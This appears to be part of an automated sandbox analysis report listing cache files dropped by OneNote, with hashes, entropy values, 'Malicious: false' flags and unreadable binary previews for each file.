C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.097213189501563
Encrypted:	false
SSDEEP:	96:0sFv/icNl9MEaumXG9P8aT3RLQX/MZYWK:0sFv/ichpaumXG9djRLQX/MZYW
MD5:	B1AA5296D30C0C770D5D69539BE27BF0
SHA1:	4BA9E73748A821FB1DABC6302D2D563DF2AC63BF
SHA-256:	1F2DF0D67AFB4861F3E17E22D12E1770E56BB95A05149982CAF5F0356B370340
SHA-512:	82CCB8DCF16DA81035AD0AA652F2834AF2538D4C00F40ECC91EE7135A4CEA815C6C1221F0DACC7F40A5E0034812BC0FA2A9C0C7D769AB4D73F9D5132711B6F95
Malicious:	false
Preview:	2...>....... ...v....................................................?....?.............................................................................2...>.......\|...v...H............................I.......I.qk..B.....LZ.6@......6@.8J=.-p..HV...6@.8J=.-p..HV...6@..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x...#..'$..........N...^.....................f@...h.o.i........f........................................I.qk..B.....LZ............x...#..'$..............x...#..'$................6@......6@......6@..........................................6@j.....6@T.]...6@......6@..B...6@H.....6@..B...6@..>.).6@..J...................;........4...4...4.."...............6@..6@..6@..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........6@......6@....#.6@............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.079507955379479
Encrypted:	false
SSDEEP:	48:+Rsskszqq77LctJt9iEfmPX3E9irVTo8rdqrslI1dXN5DOkz7/b4a:+Rss9J77LcZ9iEwX09i5TtRyNHM6M
MD5:	940430C3A804ED4D51CF98B120A77BF3
SHA1:	FDE5FE60315C25515FCBFAF727B8F37DAA3E7B01
SHA-256:	F4E8E4255FB6F4147984A87AF6E029DA75010F0A2E473748E5D91CE018578A59
SHA-512:	40FE63F5361B7418E120C118AA6EAC0A64F086BE5B20CB3AFC8A50D4C57DDC600B5348625324A46DB01D270FE688CDBECED14B64FE3A8917ACB040E614848EAF
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZi#......i#.n.Z{..WU.o@j%i#.n.Z{..WU.o@j%i#...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............[.m0.1.%P.........N...^...............!i2Y.Y.A..$.D.........f........................................I.qk..B.....LZ............[.m0.1.%P.............[*.m0.1.%P..............i#......i#......i#..........................................i#.j....i#.T.]..i#......i#...B..i#.H....i#...B..i#...>.)i#...J...................;........4...4...4.."..............i#..i#..i#...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........i#......i#.....#i#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.065427618780622
Encrypted:	false
SSDEEP:	96:fXpsusymS40tv8V9E3oXbc94VT9RiSVEym4a0Sek:xsY4UvDYXbc94VpRiSV
MD5:	907494CF7ED1EE69FEC530603E7D8131
SHA1:	D4AF5A8402273D74B1EDA0170EDC5C97B33AFA8E
SHA-256:	4C2CFFE4DF18DAA6D1FABD53ECF70DF2FCEB81F4FF50B8E1CFBEA596E0D542F6
SHA-512:	B33DAA9023986B8D4F2121A0A68DC6B73E7A70102913B895E5CAAFA1EAD59507FEF918809619DE9C333E0BFBD73C999A3B7390D654A3181D8BEE3D53465454BD
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZLh......Lh..+pC........Lh..+pC........Lh...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.....1u.!..e....N...^................\'..u.O....o.........f........................................I.qk..B.....LZ.............f.....1u.!..e.........f.....1u.!..e.........Lh......Lh......Lh..........................................Lh.j....Lh.T.]..Lh......Lh..B..Lh.H....Lh...B..Lh...>.)Lh...J...................;........4...4...4.."..............Lh..Lh..Lh...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Lh......Lh.....#Lh.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.039701554034713
Encrypted:	false
SSDEEP:	48:/psV0HtBQ51Yt+DEEl5Xk9884Toirdnrc/I0MdXHpAHKHBlFHmlHxHKHhdHvHeg:/ps+e1YvETXk98TTHRrcQtfTI
MD5:	E94C8824D0F80A9847F422736140CA3B
SHA1:	282DCA6D719B9969A6576232F40CAFD39CB5514F
SHA-256:	31373C03037B87896ED479FE2BC862523AD345659FB8EEDC13FAA960AE5CB3C5
SHA-512:	867047CF7DFF98A75359536C317CCDC8C543D662E507DFD491934C125ED7C7607159321BC1D7ED4E0FF771F25971A518F564FC8195B9A5A04EF97957F22ED922
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................i.......i.}$6....e7<2./.I.......I.qk..B.....LZ.i.}$6....e7<2./.i...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?..!..!,...6_.....N...^.................Q..RzD.]\.Bj..........f........................................I.qk..B.....LZ.............?..!..!,...6_..........?..!..!,...6_...........i.......i.......i...........................................i.j.....i.T.]...i.......i...B...i.H.....i...B...i...>.).i...J...................;........4...4...4.."...............i...i...i...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i.......i.....#.i.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.052381227056883
Encrypted:	false
SSDEEP:	96:+8BsvseF8sCAEHOXo9sST4RyzSXo1XmRoOOrh:+8BsvLF8FdHOXo9sSURyzSXo1XmRoDr
MD5:	410EA42562945206AA2F25F1023D67FF
SHA1:	5C8DBF60B858F6D1AE4FFC6B657F45634FA6D8D3
SHA-256:	545ECB77E90AC9D40ACA9BEF56CAD896F4EF7FE6F40A09FE1A370EAE8A145DD1
SHA-512:	54E489AE5DB568E66CCF465101BEFA5F93A4AC0073CA60BAE25C4F4C4264420E90A0F99E711223B9B9D4E14382F3F5C340C2A92E5FB6D4E33E5A7A780726A3AF
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZvs......vs..Z...?..]n..vs..Z...?..]n..vs...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................6....Ml.N.....N...^....................C..F ............f........................................I.qk..B.....LZ................6....Ml.N.............6....Ml.N..........vs......vs......vs..........................................vs.j....vs.T.]..vs......vs...B..vs.H....vs...B..vs...>.)vs...J...................;........4...4...4.."..............vs..vs..vs...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........vs......vs.....#vs.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.091589447460024
Encrypted:	false
SSDEEP:	48:Ypsl8Ud3XW90+tHW2EEfXE9Ua3IToPrdDruI0dXgsIR1ajFEok:asNW9dTEeXE9NITGRPUg
MD5:	1A712B77CCC5D262D8C2731F7489C803
SHA1:	2E4C115BBF280DCDE0223EAED8E3F0880A20C897
SHA-256:	9C3C6AEEA6FFA02DA9EF2D2349689B3D81B0BB6C978B6D5973989E24E021B878
SHA-512:	40A0C75BA07861822E8C697999A313612C14D637DF364119D995A17BB2140073801889AA89AFF44F5B1BC099A616ECBBA133C99775B22FDE186418C19A9CCC96
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.............;....D........;....D......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7uzv..j..........N...^................p?$s..F................f........................................I.qk..B.....LZ...............7uzv..j.................7uzv..j..........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.098803473145921
Encrypted:	false
SSDEEP:	96:iJs6MkUWjNiMEYkwXbw9ZlTxR2Wj5UJc1uMF1r:ys6PjOYkwXbw9Zl1R2WjEit
MD5:	4FF4907877F97694B4AC8B17492BD256
SHA1:	818E256EA67CDB7FCEA3B8643AC00A46C7D3519A
SHA-256:	B2BA9F0DA0B5D9115842007798726589E52C269211511FC0E873AC60531EAEFB
SHA-512:	4E9FC2F0788B896498CC7040CC01C1B27BC192A5CCC69929E366A122A2B2527801154E9B4936E87A72DF642FF4127A80681B6F12E7798B92F70070769F4635D5
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.l......lk.....X....G(.lk.....X....G(.l..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............'..^....3...,.......N...^..................+..=G.H..S...........f........................................I.qk..B.....LZ............'..^....3...,...........'..^....3...,.............l......l......l..........................................lj.....lT.]...l......l..B...lH.....l..B...l..>.).l..J...................;........4...4...4.."...............l..l..l..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........l......l....#.l............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.068799285383755
Encrypted:	false
SSDEEP:	48:YpsSwX0xEKObTtGjKEn6rdXY9i6UTToHrdvlxr2dIM/dXU9RAOxF:qssiKOPbEIXY95UTTeRHy/s
MD5:	771A6A71BAF2DC57CBDFFF6D41F822E9
SHA1:	20E177E4F348D36BA13E578BDCD4D7E0052A8D68
SHA-256:	B3E638AFB0D6CFC02EFD9B6566F6E694FBE29C79B51768E2DDD09CA49D3CD276
SHA-512:	F846B3C5FC072EF7587128360A58DC211B36A93D47EE05E1F700F84D468CE65038EE6A05FB0591FAE7650B86E2E8BFCC82212A79260005B480A9681AE1981624
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.[e......[e9.i...H:K... .[e9.i...H:K... .[e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3.#.......#.M.~(....N...^...................Q>M.e..+...........f........................................I.qk..B.....LZ............3.#.......#.M.~(........3.#.......#.M.~(..........[e......[e......[e..........................................[ej.....[eT.]...[e......[e..B...[eH.....[e..B...[e..>.).[e..J...................;........4...4...4.."...............[e..[e..[e..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........[e......[e....#.[e............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.092435552555433
Encrypted:	false
SSDEEP:	48:Y9sVXo1lvM+Smtnu7tkEXgZkXA9Ww9fLkfToTrdPrhIsLdXgJR5ldJN:+sge+Sm8GEXgSXA9flLkfTiRjVLoJ
MD5:	A5FA06B56773EFA209F01051D4CE49AF
SHA1:	E01E1A7DE23B6862E404CA0894286007448EF971
SHA-256:	96B654482B6FFDCD2D6ECD240D0A39F577E3AB6D173B4CA7280A2AD9008ADFEF
SHA-512:	9FDB5BD5A2BBAABCF220CD2484A1D091434F378824B6514CC8884CAEFF0F3BFFABA1B220DD2D109D580CCA2458DB760B2EA9C7B11563BB22EB39F95FDA1317EC
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.a......ag.`..<.......ag.`..<.......a..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............%.=.7@....M.-.,....N...^................T..F..[...U.........f........................................I.qk..B.....LZ.............%.=.7@....M.-.,.........%.=.7@....M.-.,..........a......a......a..........................................aj.....aT.]...a......a..B...aH.....a..B...a..>.).a..J...................;........4...4...4.."...............a..a..a..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........a......a....#*.a............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.066169166067219
Encrypted:	false
SSDEEP:	48:YBsT60x46tEdWE8CXc9m+TqTodrdQryIOdXuBRPUi2O:is/x46fEjXc9m+TqTwRISC2
MD5:	DB6E2A9DE7F687E1F788D2113D9C2999
SHA1:	513A19B9A22181C8035A8B402A4CBE8109B93068
SHA-256:	732EBAF0C40B1451EE7FD53E947969C60E4CA21BCA101B6B9363ACA4BE9D0482
SHA-512:	965C2A1478CC8062399F4F6DF1485C89BBF4CDD5963D816615D2DE1866B8280B72D3326B215D426ACAA2A5A0A5A2481326ED96D0F3557D7C99F422B93543B2AA
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.:p......:p.D7H...v+8....:p.D7H...v+8....:p..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............HY.L.j....j.D.F?....N...^...............m.!W#..I.....a1........f........................................I.qk..B.....LZ............HY.L.j....j.D.F?........HY.L.j....j.D.F?..........:p......:p......:p..........................................:pj.....:pT.]...:p......:p..B...:pH.....:p..B...:p..>.).:p..J...................;........4...4...4.."...............:p..:p..:p..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........:p......:p....#.:p............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0412965132382235
Encrypted:	false
SSDEEP:	48:YFsDoNAgOYQOa+tWmELh9lXo9BnmTolrdP7rZmIqdXW5RDOU7HZ/l:2suQT+bEflXo99mTMRf4C
MD5:	232C2051063C288962D4838AAC1A7CEF
SHA1:	BEAB37963337454DD78F0E83C464D09CD2A82017
SHA-256:	A93FAF34FB83CFF62D175647F64D078A55FC8CD79FD70DA7586BF1E45E6A4D0B
SHA-512:	879B944D876921D3D3477EC2B8D56055DDD1ECF619676F71B8C1C9EEBF24E547F3A25B03DAFB60FB0545C617DC731DF51098CE44981216F4E6963B44FDEBCE78
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ\|.......\|...........J..\|...........J..\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................hs..u..........N...^...............]8.v`2.B.>.y..lf........f........................................I.qk..B.....LZ.................hs..u...................hs..u...............\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.088205386083752
Encrypted:	false
SSDEEP:	48:Y6S7Ds4tKL68KthsWEFnHsX/s9hnkTo7rd2trgIwdXAdRioGQ5:0Dsn23jEFMXU9hnkTWReGur
MD5:	0DE5B7FE8841246918EEFB4733DA72B6
SHA1:	F157454487D99308A45D738FE1D31CB40E9E6C02
SHA-256:	727A45B183F4ACA3F2FFC0DAD1452680400AB15FA092D1DC13941A2CA55E17F6
SHA-512:	8CB9D7611102B85B946562D48C5A6A16B89C90328921148F1984C45FE9BDCD5F04AB69AF07446FE4EC3A37FCF2E82CF302C1298F3E49773241A144777DFCA09B
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J......................................\|>o..;7.......I.......I.qk..B.....LZ...\|>o..;7...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............K.N_..@7&..H.....N...^................u..\.E.k..............f........................................I.qk..B.....LZ..............K.N_..@7&..H...........K.N_..@7&..H.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094929992227166
Encrypted:	false
SSDEEP:	48:lsevWOcrtptsEtlX5m9LqyTodrdfokr5I+dX6+kuUwa:lsYcrZsEHX5m9WyTMRfHL7uw
MD5:	917CFFBE6A034708E232D50C05DA53C6
SHA1:	DB79B1DA9AC178B39F7EB2675E04BCF972F4B8E0
SHA-256:	8703DACC9A87F03FA3E885A6C20185BC97C0F8AD30E117B760A7F6F293C2440C
SHA-512:	F28F734374CC1E5FEFC341C5A92DBB86B357156D0908D6D4ABBE8045F0C9AF1E2B3615157566E00ACABB62B673F33633C99FDAC53E858E44737E1ECC587550E4
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.2......2m...;K.nCo.2m...;K.nCo.2..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............5....K.$C..........N...^...............s..?..UK..'S;.~.........f........................................I.qk..B.....LZ.............5....K.$C...............5....K.$C................2......2......2..........................................2j.....2T.]...2......2..B...2H.....2..B...2..>.).2..J...................;........4...4...4.."...............2..2..2..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........2......2....#*.2............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.097697147336174
Encrypted:	false
SSDEEP:	48:tsw7D+oK7S2tCxmtgEno3tL8XbL89y1A8XTocJrdlrqITdXN+kwSEa:tsm12k+gEKAXbA9YA8XTJJRp3OuE
MD5:	F6048B2D0E0F04F60041A841C3BE227F
SHA1:	035E207C6F106052CEB4BE3D80459F81CF0B4054
SHA-256:	DB7888379EB8B908B24B4429C200CA98DBCBEF4CA3DA14A5BAD57114DE424EF8
SHA-512:	28641C8B602408BCF3838AD42E3500D3D7AECE8A166BEE128C607CF96C4FBC9EA2C4769793E4A9AB009C22B3932BA8E616E74487EABBC03B63302A9A4DEAC5A4
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZDw......Dw.m%l..:.....J?Dw.m%l..:.....J?Dw...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............G......N.8&.......N...^................F.\|Xe.H...X.@u........f........................................I.qk..B.....LZ.............G......N.8&............G......N.8&............Dw......Dw......Dw..........................................Dw.j....Dw.T.]..Dw......Dw..B..Dw.H....Dw...B..Dw...>.)Dw...J...................;........4...4...4.."..............Dw..Dw..Dw...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Dw......Dw.....#Dw.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.096505730011047
Encrypted:	false
SSDEEP:	48:1s3FmhGnS+mt0TrUfdt4EdsKXdK9SCF7ToNxrddrfIZqdXo+k7/Ma:1sMyS+mtf34EJXg9SCRTSRRzJOM
MD5:	E105BFDFFAA6B30869A26550A93D260D
SHA1:	7AAE67A907B257F52D878F1B8BF103B51C7BFC4B
SHA-256:	2BDDE3741FBA77033C4913ADFF754DF85EDB7B6B2CEA8DE79E2E0FA94B68EB53
SHA-512:	3FB58A71DDFB749896B4E3979F4D19AAE9E57B506052EBBB9867372190849EB60A7A2B4DC6383D6E6136BAC7F23635086E4B4DAC05CD6A7F5BA945FAA4AAC619
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ...........8T.y....Y.MN...8T.y....Y.MN.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3r..51....{.EZs.....N...^................b...$B.}...!h.........f........................................I.qk..B.....LZ............3r..51....{.EZs.........3r..51....{.EZs.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.148702149222483
Encrypted:	false
SSDEEP:	96:QddsrLcpDZS0E9EaXk9ZjTTRv3QUc9DRxrXA:QddsQFS4aXk9ZjvRv3
MD5:	FFB8CC5F3980D336DF1B46145F98D3D9
SHA1:	DD23B8C2FB9B9655F24CF98307B7D7C3EF7B2058
SHA-256:	E3D0E6D637100FCD8E6F82663AA81D2A09357A27DBEE126BAD9430A23F9321AF
SHA-512:	4D2FF5540C33D60B0E6D56506D02DE0B155677EDBCF231A9FBCD171A2458C7956A80F5B7866992C7724CA84CA91CBEABD3684F8C7DE77E83821E46C73C6A5436
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ...........c..b..^...z....c..b..^...z......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Z......ys......N...^.................H..3H..$............f........................................I.qk..B.....LZ...............Z......ys.............Z......ys.*.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.1674025146670814
Encrypted:	false
SSDEEP:	48:+s3S7HIyXKtbttUEPlOBXk9Q8fToFrdQrSnhIp/dXXzkNuBig:+s8oyXKpUEPsXk9zTcRIK6/su
MD5:	5A28992181DFEFD180CB0A8624A3761F
SHA1:	E3793898D2F6EB8F4766D559AF631367CF9C789C
SHA-256:	22CA3ADCF8D699E7CA54D70FD7D0E747A469BA50696DAD199EC2C682F0C1C363
SHA-512:	D7370336F1006B7F66E01183FE0991E51AC8C50BF50B150E019EFE5B640BB6CF5B2F1BBF21EC55A47DC6CF037D3D687E03E82882567C36B268E79CCFF66B8D53
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ............!.;D...........!.;D..........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............$gb.{...#..aT....N...^...............d.... C..5.y\.........f........................................I.qk..B.....LZ.............$gb.{...#..aT.........$gb.{...#..aT....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.143638005615839
Encrypted:	false
SSDEEP:	48:Qesyc/hdmxmVBtg5+EBAC+reXs9P+ToeEJrdSrwIwdXYy9RI+:FsZkxmVBFEBA7iXs9mTr6RKWb
MD5:	68F63BB852654DE13BF0C16A7169D8E6
SHA1:	19F087F3CFCD87D9E32C411871C7B4BF8C66BBC0
SHA-256:	6693170C35EEF7DF02A68764DD11A0120F2A9F80349CA5FDA5D4F66A092EE4F3
SHA-512:	3B4A0E7897BCFC2B4EFD4EC4C263C1F8883024BBBCBEF73E0F702DBDB6A219C6EDB1B575880B7CE16FA472F80C1FA6F6A5B8BEF747B36ADE0412C59A89B6907C
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.N.......N..<.q..[..2._.N..<.q..[..2._.N...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............iU.'.k..A.3.S......N...^...............z...x.GJ.a.fA...........f........................................I.qk..B.....LZ.............iU.'.k..A.3.S...........iU.'.k..A.3.S............N.......N.......N...........................................N.j.....N.T.]...N.......N...B...N.H.....N...B...N...>.).N...J...................;........4...4...4.."...............N...N...N...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........N.......N.....#.N.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.103049632537083
Encrypted:	false
SSDEEP:	48:Cesafm5fittCeE7CW3Xs9NdXTogrdSreIpdXfGFxmMZ:Vsdfi5E7tXs9NRThRK5Ct
MD5:	89E781F4E8AC2B1F5B5950AB7669FDDA
SHA1:	08526A3164393503CF38B2421B3E844DAF1A41AF
SHA-256:	940AC3A2B08923C1296E0AFB6723B58EB6C0A44F1B46EE11E0D47E9268B1C32C
SHA-512:	1439A97DE42AE273BC21E84001A7A436AAA4F28CEC56A00522FB009B8A89CA28CBAC7DBD2D8ED5261260171E934BAE849A22AC23E1381F6A9699CD839A44F569
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.o.......o...9....E..Cl..o...9....E..Cl..o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............1.....-.:...-....N...^................f@..#.K...x..).........f........................................I.qk..B.....LZ............1.....-.:...-........1.....-.:...-..........o.......o.......o...........................................o.j.....o.T.]...o.......o...B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.120985892418447
Encrypted:	false
SSDEEP:	48:WEtsAo67JXrC/7Zct3w6EEC/lXU9dJxToerdSrLIndXhW4J8g4kebN:VsarE7ZcREEAXU9dT3RKYc
MD5:	069CAB6323328C856A169204F25998F6
SHA1:	B16368E012D622283DB80CE8CD7BF8052F9B5995
SHA-256:	C27CBFFEFFAEA11CCDB095F96A70E6C793BD16DD9D1DC96248DC79E84B71C63A
SHA-512:	E16C338E6F194ABA4744F1A1329169100B1748FE20FAFCB7C8F7836223AFB709DFB927B0DAE1DE41251AF3EC8E807B594635EB72B053F63E88187FA32A7FFD1D
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ'.......'..a........p$,8'..a........p$,8'....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. .J..H..HgB.D......N...^.................$..6F.^@.............f........................................I.qk..B.....LZ............ .J..H..HgB.D.......... .J..H..HgB.D...........'.......'.......'...........................................'..j....'..T.]..'.......'...B..'..H....'....B..'....>.)'....J...................;........4...4...4.."..............'...'...'....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........'.......'......#'..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.144221523787201
Encrypted:	false
SSDEEP:	48:jyysnKgYjStQtAOE2CHQBXrEPB9rO0To6rdSr6IBRdX5ALX86p:VsTtQtE2PBXgB9q0TPRKLA
MD5:	5EE9A6895214E85A137F3A784F60CFD7
SHA1:	CED03E6333780485DA2DAB834B5E2242F3DA3CC3
SHA-256:	9762093E9A300FCEA514C47866B31E4A28BE13040F6308A877372D5EF8A4DB77
SHA-512:	966239B7530B49A6F79E501118B1742B4747748B1CCFA4485CD911863A1ADCA59B2A13F218E756098B611841DC4943873457B05382711824AB3007175010F8B6
Malicious:	false
